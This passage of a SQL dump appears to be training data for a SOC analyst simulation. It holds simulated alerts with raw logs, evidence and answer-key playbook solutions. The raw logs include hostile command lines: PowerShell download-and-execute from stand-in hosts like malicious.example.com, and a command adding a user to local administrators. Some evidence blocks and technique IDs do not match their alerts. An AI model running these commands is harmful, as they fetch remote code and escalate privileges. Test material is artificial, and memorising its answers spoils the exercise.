3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"victim-machine\\\",\\\"domain\\\":\\\"maliciousdomain.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"victim-machine\\\",\\\"domain\\\":\\\"maliciousdomain.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(231, 'Suspicious PSExec Activity Detected on Internal Network', 'high', 'CrowdStrike', 'A suspicious PSExec process was initiated from an internal machine attempting lateral movement across the network. The source machine is exhibiting signs of compromise.', 'Lateral Movement', 'T1077', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-WORKSTATION01\",\"file_hash\":\"ab56b4d92b40713acc5af89985d4b786\",\"process_name\":\"psexec.exe\"}', '2025-12-25 21:27:43', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of source machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target machine\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"ab56b4d92b40713acc5af89985d4b786\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash observed in known malware campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec and the malicious hash associated with known malware campaigns indicates a true positive for lateral movement within the network.\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, 
'{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(233, 'Phishing Attempt with Malicious URL', 'critical', 'Proofpoint', 'A phishing email was detected with a spoofed sender domain and a malicious URL intended to steal credentials.', 'Phishing', 'T1566', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-01T09:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"email_sender\":\"noreply@secure-bank.com\",\"url\":\"http://secure-bank.com/login\",\"username\":\"target_user\"}', '2025-12-26 09:43:56', '2026-03-13 03:00:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 500 times for hosting phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-bank.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"noreply@secure-bank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered with no reputation\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing email contains a malicious URL that leads to a credential-stealing page.\"}', 'Advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt with Malicious URL\",\"date\":\"2026-02-01T20:32:18.829Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice 
immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(234, 'Suspicious Lateral Movement Detected via PSExec', 'medium', 'Wazuh', 'An internal host used PSExec to connect to multiple internal machines, indicating potential lateral movement.', 'Lateral Movement', 'T1570', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-01T11:05:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"10.0.0.25\",\"username\":\"admin_user\",\"hostname\":\"server-02\"}', '2025-12-26 15:36:00', '2026-03-13 03:08:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Source IP is within internal network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Destination IP is within internal network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Admin account used for PSExec\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec by an admin account for lateral movement is suspicious and requires further investigation.\"}', 'Beginner', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.829Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T11:05:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"server-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.829Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T11:05:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"server-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.829Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T11:05:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"server-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.829Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T11:05:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"server-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.829Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T11:05:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"server-02\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(235, 'False Positive: High Volume Network Traffic Alert', 'low', 'Firewall', 'An unusual spike in network traffic was detected originating from a trusted internal server, initially suspected as data exfiltration.', 'Data Exfil', 'T1020', 0, 'investigating', 225, '{\"timestamp\":\"2023-10-01T13:45:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.100\",\"username\":\"service_account\",\"hostname\":\"data-server\"}', '2025-12-26 19:45:34', '2026-03-13 03:31:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in routine backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"External IP involved in regular data backup\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Service account used for scheduled data transfer\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert was triggered by a scheduled backup process, not malicious activity.\"}', 'Beginner', 'NDR', 1, 0, 'FINANCE', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(236, 'Unauthorized Access Attempt via Credential Brute Force Detected', 'high', 'Firewall', 'A high number of failed login attempts were detected from a single IP address. This is indicative of a brute force attack attempting to gain unauthorized access to the organization’s internal systems. See MITRE ATT&CK Technique T1110 for Brute Force examples.', 'Brute Force', 'T1110', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-15T02:38:47Z\",\"source_ip\":\"192.0.2.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":\"22\",\"event\":\"Failed login attempt\",\"username\":\"admin\",\"attempt_count\":150,\"device\":\"Firewall\",\"location\":\"New York, USA\",\"rule_triggered\":\"Brute Force Detection Policy\",\"log_id\":\"fw123456789\",\"session_id\":\"5d2b7c4f-e5c4-42b0-b5e1-d4f7e642b895\"}', '2025-12-26 05:00:04', '2026-03-15 10:41:09', NULL, 'Intermediate', 'SIEM', 1, 0, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(237, 'Suspicious PowerShell Script Execution', 'high', 'process', 'A PowerShell script was executed with commands commonly associated with file-less malware activity.', 'Malicious Script Execution', 'T1086', 1, 'investigating', 303, '{\"timestamp\":\"2023-11-01T14:23:05.123Z\",\"hostname\":\"DESKTOP-7GTB8K3\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"pid\":4521,\"cmdline\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com/script.ps1\')\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"parent_process\":\"explorer.exe\",\"parent_pid\":3428,\"network_activity\":{\"url_accessed\":\"http://malicious.example.com/script.ps1\",\"resolved_ip\":\"192.0.2.123\"}}', '2025-12-26 05:41:40', '2026-03-15 17:21:45', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"109.12.97.181\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(238, 'Suspicious Admin Privilege Escalation Detected', 'high', 'process', 'A process was initiated to grant administrative privileges using a seldom used elevated command, indicating potential privilege escalation.', 'Privilege_Escalation', 'T1055 - Process Injection', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-23T14:35:29Z\",\"hostname\":\"finance-server-01\",\"username\":\"jdoe\",\"process_name\":\"cmd.exe\",\"cmdline\":\"cmd.exe /c net localgroup administrators jdoe /add\",\"file_hash\":\"8c7b59a2e13572bf7c147de025d3d02123f7988c\",\"pid\":2356,\"parent_process_name\":\"explorer.exe\",\"parent_pid\":1024,\"user_domain\":\"CORP\",\"event_id\":4678,\"source_ip\":\"192.168.5.10\"}', '2025-12-26 05:57:25', '2026-02-15 05:07:16', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"32.46.140.23\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(239, 'Suspicious Remote Code Execution Detected', 'high', 'Endpoint Protection', 'A potential remote code execution was detected on an endpoint, involving a suspicious PowerShell command executed via obfuscation tactics.', 'process', 'T1059.001', 1, 'investigating', 137, '{\"timestamp\":\"2023-10-25T14:23:07Z\",\"endpoint_id\":\"WIN-7G8H9JKL01\",\"event_id\":4103,\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -nop -w hidden -enc WwBTAFUAUgByAFIAXABfAGsAYgB5AHAANQBoAGYAMQBzAC0AaQBzAGMAbwBtAG0AYQBuAGQAXQB7AGU...\",\"integrity_level\":\"High\",\"parent_process\":{\"name\":\"explorer.exe\",\"pid\":4568},\"file_hash\":{\"md5\":\"3b3f6bf0277b2973ff07371d5c6efbff\",\"sha1\":\"42ebf3a68eee911d85c9d6041d3b8e4c4ecf6dd2\"},\"user\":\"DOMAIN\\\\jdoe\",\"network_activity\":{\"outbound\":true,\"destination_ip\":\"10.0.0.75\",\"destination_port\":80}}', '2025-12-26 05:44:53', '2026-02-12 23:43:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"25.133.105.171\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 25.133.105.171 reported 454 times for malicious activity. 
Abuse confidence score: 85%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"system\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(240, 'Suspicious PowerShell Command Execution', 'medium', 'endpoint', 'A potentially malicious PowerShell script was executed on the endpoint. The script uses encoded command obfuscation techniques.', 'process', 'T1059.001', 0, 'Closed', 41, '{\"timestamp\":\"2023-10-10T14:32:58Z\",\"hostname\":\"Workstation-23\",\"username\":\"jane.doe\",\"process_name\":\"powershell.exe\",\"pid\":4567,\"parent_process\":\"explorer.exe\",\"ppid\":789,\"cmdline\":\"powershell.exe -NoProfile -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AYQBnAGs\",\"file_hash\":\"3f50f0a35cc9b36fc3f0e1f2b0cf3a78\",\"user_domain\":\"CORP\",\"integrity_level\":\"High\",\"command_length\":43}', '2025-12-27 05:37:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"242.96.134.59\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 242.96.134.59 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User accessed from known location during normal business hours. 
Activity consistent with role.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(241, 'Suspicious Command Execution Detected', 'medium', 'process', 'A suspicious command execution was detected involving base64 encoding of an unknown script.', 'Potential Obfuscation or Encoding', 'T1027 - Obfuscated Files or Information', 0, 'Closed', 41, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"hostname\":\"workstation-7F5D\",\"username\":\"j.doe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -NoProfile -Command Invoke-Expression (New-Object Net.WebClient).DownloadString(\'http://malicious.example/script\')\",\"file_hash\":\"sha256:d8a1c4cbf1e1367c2c6fd589v71c4c6f2b3d8e56ab60dcd526bfed9f2b68be23\",\"parent_process_name\":\"explorer.exe\",\"parent_pid\":1020,\"pid\":3284,\"event_id\":4688,\"event_message\":\"A new process has been created\"}', '2025-12-27 05:01:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"100.56.249.171\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 100.56.249.171 reported 173 times for malicious activity. 
Abuse confidence score: 93%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(242, 'Suspicious PowerShell Script Execution Detected', 'high', 'endpoint', 'A potentially malicious PowerShell script with obfuscated code has been executed on an endpoint.', 'Process Execution', 'T1059.001', 1, 'investigating', 225, '{\"timestamp\":\"2023-11-01T14:32:16Z\",\"hostname\":\"DESKTOP-7GTHB9K\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"process_id\":2678,\"cmdline\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAHQAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGU... (truncated)\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"file_hash\":\"2B2B6D120897FBB5783C3F8DCF57DBBA\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":1744,\"network_activity\":{\"dest_ip\":\"192.168.1.10\",\"dest_port\":80},\"registry_modifications\":{\"key\":\"HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command\",\"value\":\"calc.exe\"}}', '2025-12-27 05:08:14', '2026-03-15 10:54:30', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"162.113.139.213\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(243, 'Critical RDP Brute Force Attack Detected', 'critical', 'Firewall', 'Multiple failed RDP login attempts were detected from a single external IP address, indicating a brute force attack. This pattern of behavior is consistent with tactics outlined in cybersecurity incidents, such as the worldwide brute force attacks on RDP services in 2021.', 'Brute Force', 'T1110', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-24T18:35:24Z\",\"src_ip\":\"192.168.1.25\",\"dest_ip\":\"10.0.0.4\",\"attempt_count\":45,\"usernames_attempted\":[\"admin\",\"guest\",\"user1\"],\"protocol\":\"RDP\",\"event\":\"Failed login attempt\",\"firewall_id\":\"fw-12345678\",\"region\":\"us-west-2\",\"request_id\":\"req-abc123\",\"message\":\"Login failed due to incorrect credentials\",\"related_events\":[{\"timestamp\":\"2023-10-24T18:32:03Z\",\"src_ip\":\"192.168.1.25\",\"event\":\"Login attempt\"},{\"timestamp\":\"2023-10-24T18:34:16Z\",\"src_ip\":\"192.168.1.25\",\"event\":\"Connection established\"}],\"geo_location\":{\"country\":\"Unknown\",\"region\":\"Unknown\"}}', '2025-12-27 05:00:06', '2026-03-16 02:59:05', NULL, 'Advanced', 'SIEM', 1, 0, 'OT_ICS', 